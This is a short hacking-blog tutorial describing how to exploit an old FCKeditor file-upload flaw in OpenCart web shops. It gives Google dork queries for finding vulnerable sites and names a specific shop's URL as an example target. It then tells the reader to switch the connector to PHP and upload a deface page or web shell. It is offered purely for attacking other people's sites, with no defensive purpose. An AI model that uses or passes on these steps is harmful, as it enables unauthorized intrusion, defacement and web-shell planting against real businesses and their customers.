This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here
1- open Google.com and enter
Dork: inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
inurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
http://www.schoolshopper.com.au/
Then i'll will simply add the vuln URL after the website
Example
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
(The path May be chnaged in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
Now a Page will be open Like This
Now See The connector option which is on top left side on page, Change The Connector into PHP
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php
0 comments:
Post a Comment